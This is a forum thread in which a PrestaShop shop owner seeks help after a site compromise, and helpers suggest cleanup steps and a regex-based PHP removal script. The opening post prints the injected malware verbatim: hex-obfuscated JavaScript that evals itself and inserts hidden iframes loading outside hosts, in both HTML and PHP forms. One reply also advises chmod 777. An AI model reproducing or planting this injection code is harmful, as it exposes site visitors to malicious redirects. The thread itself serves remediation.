Recover After Intrusion

[Anony]

Hi. I'm still running prestashop 1.4x 'cause the skin I've bought doesn't have an update for the v. 1.5x. A month ago my site (link is in my personal specs) got an intrusion: they infiltrated a code which visualizes an iframe at the height of the header part (you can see it in my pages): this was apparently caused by the insertion of a js snippet apparently inside all the tmpl files, js files and php files of this skin. This snippet apparently causes some malfunctions in the overall, such as scrambling the page.

 

The js in question should be the following code:

 

[font="Candara, Verdana, Arial, Helvetica"][size="3"]<!--68c8c7--><script type="text/javascript" language="javascript" > asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x70,0x71,0x63,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x6f,0x78,0x75,0x32,0x33,0x2e,0x62,0x6c,0x75,0x65,0x2d,0x68,0x6f,0x73,0x74,0x2e,0x77,0x72,0x6f,0x63,0x6c,0x61,0x77,0x2e,0x70,0x6c,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x65,0x72,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x70,0x71,0x63,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x70,0x71,0x63,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x70,0x71,0x63,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x70,0x71,0x63,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x70,0x71,0x63,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=183;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-484!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);[spam-filter]</script><!--/68c8c7-->[/size][/font]

 

 

The code apparently outputted by this js is featured as the prime lines in the source of any pages, and it is the following:

<script type="text/javascript" language="javascript" >																																																														  (function () {	var id = '7';	var cb09 = document.createElement('iframe');	cb09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php';	cb09.style.position = 'absolute';	cb09.style.border = '1';	cb09.style.height = '31px';	cb09.style.width = '42px';	cb09.style.left = '500px';	cb09.style.top = '100px';	if (!document.getElementById('cb')) {		document.write('<style>body{overflow-x:hidden;}</style>');		document.write('<div id=\'cb\' style="position:absolute; width:80%; height:100%;" ></div>');		document.getElementById('cb').appendChild(cb09);	[spam-filter])();</script>

 

Moreover, I see in many php files also the following junk (if it is that):

 

?>
<?
#68c8c7# echo " <script type="text/javascript" language="javascript" > asgq=[0x28,0x66,0x75,0x6e,										0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x77,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x6f,0x78,0x75,0x32,0x33,0x2e,0x62,0x6c,0x75,0x65,0x2d,0x68,0x6f,0x73,0x74,0x2e,0x77,0x72,0x6f,0x63,0x6c,0x61,0x77,0x2e,0x70,0x6c,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x65,0x72,0x2e,0x70,0x68,0x70,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x70,0x6f,0x73,0x69,0x74,0x69,0x6f,0x6e,0x20,0x3d,0x20,0x27,0x61,0x62,0x73,0x6f,0x6c,0x75,0x74,0x65,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x62,0x6f,0x72,0x64,0x65,0x72,0x20,0x3d,0x20,0x27,0x30,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0 x79,0x6c ,0x65,0x2e,0x68,0x65,0x69,0x67,0x68,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x77,0x69,0x64,0x74,0x68,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x6c,0x65,0x66,0x74,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x77,0x2e,0x73,0x74,0x79,0x6c,0x65,0x2e,0x74,0x6f,0x70,0x20,0x3d,0x20,0x27,0x31,0x70,0x78,0x27,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x69,0x66,0x20,0x28,0x21,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x77,0x27,0x29,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x77,0x72,0x69,0x74,0x65,0x28,0x27,0x3c,0x64,0x69,0x76,0x20,0x69,0x64,0x3d,0x5c,0x27,0x77,0x5c,0x27,0x3e,0x3c,0x2f,0x64,0x69,0x76,0x3e,0x27,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x20,0x20,0x20,0x2 0,0x64,0 x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x77,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x77,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=3;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-460!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}z=s;e(s);[spam-filter]</script>";

			#/68c8c7#
			?>
			<?

			?>			

I've tried to remove manually all these stuff one by one, but the task was apparently impossibile, also 'cause I saw that nothing changed anyway, after each refresh of the site. So I substituted again the current affected skin with the original ones via ftp, though the iframe is still there.

I cannot reinstall the theme from the admin panel, 'cause also the admin panel seems to be affected and when I try to click any link to upload modules or expand the module accordion, I'm redirected to a 404 page in my frontend site! Saying that "sorry, the web address is no more disponible" (translated more or less to english by me from my language). I cannot click even the rotation banner at the center (which seems to load forever) in order to see what it does have to behave such a way.

The guy who crafted this skin doesn't know what to do. Perhaps someone could help me please? Thanks in advance.

Edited March 2, 2013 by Anony (see edit history)

[Dh42]

This is what I would do. I would download your whole site and use a text editor like sublime text to search and replace in all of the files for the javascript string, replace it with nothing. Then upload the site, change your ftp information and test it.

[Anony]

Hi. I already downloaded it and tried to do this: but the files are many, and I don't know where to search, and exactly what to search (these 3 snippets are what I did found so far: don't know if there are others), and what is added by the "virus".

[Dh42]

I would search these 3 snippets first. Sublime text will let you search in all of the files for the snippets. So you can search the whole folder of files with one search.

[Anony]

Ok, trying it and inform you. Thanks for now.

[Anony]

But... I've guessed that that app would remove at once the code from ALL files in the folders: should I open 'em and seek in each by hand?

But... couldn't I make it shorter if I'll re-upload the whole 1.4x prestashop, substituting at once the old infect files, whatever they are?

[HCC]

Try this

 

copy past this on e txt file an d put it on the base of you webserver with .php

you ave maby tho adapt it to you malware (any wy change the "js" folder with a blank one of you prestashop version

put the CH mode on 777 for before you run the script

Run the scrit with you browser www.yousite/ the name of you file.php

After runing mak it run one time mor to see iff its ave working (good luk )

 

 

<?php

/*

* Sample class usage

*/

$scanner = new SimpleFixScanner();

$scanner->scan();

 

/**

* Simple trojan scanner to fix some tedious trojan, that

* corrupt some files on the server.

*

* You can modify this code as you need, to add a new trojan fix

* simply add a method that give in input a filepath and return

* the appropriate exit status (see FixExitStatus class for details), and add the

* trojan name and the method name to the fixList[] array for the callback.

* See fix336988() for an example.

*

* Currently supported trojan:

* - 68c8c7 (Thanks to fatsouls32 - http://www.freestuff.gr/forums/viewtopic.php?t=64419 for 336988 regex fix)

*

 

*

*/

class SimpleFixScanner {

var $fileTypeToScan = array('php','html','htm','tpl','js');

var $fixList = array(

//'Scanner Regex Check'=>'devCheckRegex', //Use to check wich files are scannd

'Trojan 68c8c7' => 'fix68c8c7',

);

var $startTime;

var $memoryLimit = "200M";

var $docRoot;

var $filesToScan;

var $filesScannedCount = 0;

var $filesFixed = array();

 

 

/**

* Wrapper for the scan process

* @see $this->doScan()

*/

function scan(){

echo "<h3>Simple Fix Scanner</h3>";

echo "<hr />";

echo "<p>Prepare the scanner... ";

$this->prepareScanner();

echo "<i>done</i>";

echo "<br><small>(Directory: " . $this->docRoot . ")</small></p>";

 

// Do the scann process

echo "<p>Do scan... ";

$this->doScan();

echo "<i>done</i></p>";

 

// Echo scan results

$fileFixedCount = count($this->filesFixed);

if ( $fileFixedCount > 0 ){

echo "<h4>Matches:</h4>";

echo "<p>Fixed " . $fileFixedCount . " of " . $this->filesScannedCount . " files scanned</p>";

echo "<ul>";

foreach($this->filesFixed as $item) {

$exitStatus = FixExitStatus::translateExitStatus($item['exitStatus']);

echo sprintf("<li>{$exitStatus} - <strong>{$item['fix']}</strong> was found in file {$item['file']}</li>"); ;

}

echo "</ul>";

} else {

echo "<h4>No match found.</h4>";

echo "<p>{$this->filesScannedCount} file scanned.</p>";

}

 

 

 

$endtime = microtime(true);

$totaltime = ($endtime - $this->startTime);

echo "<p><small>Time elpased: ".$totaltime." seconds</small></p>";

}

 

 

/**

* Prepare the scanner

*/

function prepareScanner(){

ini_set('memory_limit', $this->memoryLimit);

$this->startTime = microtime(true);

if (!$this->docRoot)

$this->docRoot = $_SERVER['DOCUMENT_ROOT'];

$this->filesToScan = $this->getFilesToScan($this->docRoot);

}

 

/**

* Execute the scan process

* @param unknown $param

*/

function doScan() {

foreach ($this->filesToScan as $search) {

$this->filesScannedCount++;

foreach ($this->fixList as $name => $method){

$chekFile = call_user_func( array($this, $method), $search[0] );

if ( $chekFile != FixExitStatus::FILE_OK )

$this->filesFixed[] = array('fix' => $name, 'file' => $search[0], 'exitStatus' => $chekFile);

}

}

}

 

/**

* Helper to get the list of the files to scan

*/

function getFilesToScan($rootDir){

$directoryIterator = new RecursiveDirectoryIterator($rootDir);

$iterator = new RecursiveIteratorIterator($directoryIterator);

$regex ='/^.+\.(' .implode("|", $this->fileTypeToScan ) . ')$/i';

$files = new RegexIterator($iterator, $regex, RecursiveRegexIterator::GET_MATCH);

return $files;

}

 

/**

* Return true, just for check if the regex works.

* @param unknown $path

*/

function devCheckRegex($path) {

if(is_file($path))

return true;

else

return false;

}

 

 

/**

* Check and fix file for:

* 68c8c7 Trojan

* @param unknown $path

* @return true if trojan foud and fixed; otherwise false;

*/

function fix68c8c7( $path ) {

$fileFixed = false;

$regexPaterns = array(

"/#68c8c7#(.*?)#\/68c8c7#/ism", // php

"/\<!--68c8c7-->(.*?)\<!--\/68c8c7-->/ism", // html

'#(/\*68c8c7\*/).*?(/\*/68c8c7\*/)#ism', //js

);

$data = file_get_contents($path);

 

foreach ($regexPaterns as $regex) {

if (preg_match($regex,$data)){

// If foud, replace malicious code with empty string

$data = preg_replace($regex,"",$data);

$fileFixed = FixExitStatus::FILE_FIXED;

}

}

if ($fileFixed != FixExitStatus::FILE_OK)

file_put_contents( $path, $data);

 

return $fileFixed;

}

}

 

 

final class FixExitStatus {

private function __constructor() {}

// fix exit status

const FILE_OK = 0;

const FILE_FIXED = 1;

const CANT_FIX = 2;

 

public static function translateExitStatus($status) {

switch ($status) {

case FixExitStatus::FILE_OK:

return "File is safe";

break;

case FixExitStatus::FILE_FIXED:

return "File fixed";

break;

case FixExitStatus::CANT_FIX:

return "Can't fix file";

break;

}

 

 

 

}

}

 

?>

 

 

 

share|improve this answer

[Anony]

Hello HCC. I ran the script: the files was all cleaned (infacts the div has desappeared). Thanks.

 

But... When I entered the admin, I received again an alarm from my antivirus (avira): then, when I entered the "modules" section, and I tried to open one of the dropdown rows, I was again brought to the 404 error page!, saying that the "requested file is no more here"!

Apparently there's still some problem about the backstage.

What to do now?

[lynn.chris9]

Anony,

 

Have you identified how the intrusion happend into your site, Is it through theme ? I doubt

[Anony]

Anony,

 

Have you identified how the intrusion happend into your site, Is it through theme ? I doubt

? I'm afraid I don't catch what you tried to tell.

[Anony]

The provider tells me that the error_log_php file bears this line

 

[font="Candara, Verdana, Arial, Helvetica"][size="3"][11-Mar-2013 16:31:06 Europe/Berlin] PHP Deprecated: Directive 'safe_mode' is deprecated in PHP 5.3 and greater in Unknown on line[/size][/font]

 

They added also that I should "debug the application" in order to understand where the application tries to make operations reltively to the safe_mode. It's turkish to me.

[lynn.chris9]

Anony it seems the provider is using latest PHP ie; 5.4.x, I would suggest you to upgrade to latest of Presta

[Anony]

Anony it seems the provider is using latest PHP ie; 5.4.x, I would suggest you to upgrade to latest of Presta

Hi Lynn (sorry for the delay; I wonder why so far I didn't received any mail updates of new posts... I came here just out of curiosity if anybody had found any solution!); as I said, it seems that the skin I'm using (and I paid) is not ok for the PS versions higher than 1.4x (and it seems that it's coder doesn't have any will do make an upgrade). So far I'm stuck. The site's warns that there's a virus. The coder wouldn't enter the admin panel 'cause "he's afraid" of the virus... What should I do now?

[Anony]

bump?

[AZC]

@HCC that is genius! it's brilliant, worked perfectly!

[jetx]

Anony, it appears you have no full site backups? If you do then simply use something like Winmerge to compare folders, files. You also need to plug whatever hole your site has (whether it be outdated and vulnerable software or by another means).  Based on the date you were hacked can your hosting company send you the log?